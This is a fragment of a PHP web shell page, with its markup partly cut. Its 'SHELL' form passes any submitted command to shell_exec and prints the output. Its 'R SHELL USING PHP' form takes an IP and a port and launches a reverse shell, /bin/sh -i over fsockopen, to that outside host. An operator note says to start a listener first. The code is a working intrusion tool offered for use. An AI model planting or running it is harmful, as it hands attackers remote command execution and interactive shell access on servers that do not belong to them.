" method="POST">

KNOCK KNOCK


SHELL

COMMAND :

R SHELL USING PHP

*NOTE : Before triggring rshell, start listening


IP :  PORT :

&1"); echo $cmd."
"."
".$output."
"; } if (isset($_POST["ip"]) && isset($_POST["port"])) { $sock="sock"; $cmd = "php -r '$"."{$sock}"."=fsockopen("."\"{$_POST["ip"]}\"".","."{$_POST["port"]}".");shell_exec(\""."/bin/sh -i <&3 >&3 2>&3"."\");'"; if (strlen($cmd)>66) { shell_exec("{$cmd} 2>&1"); } } ?>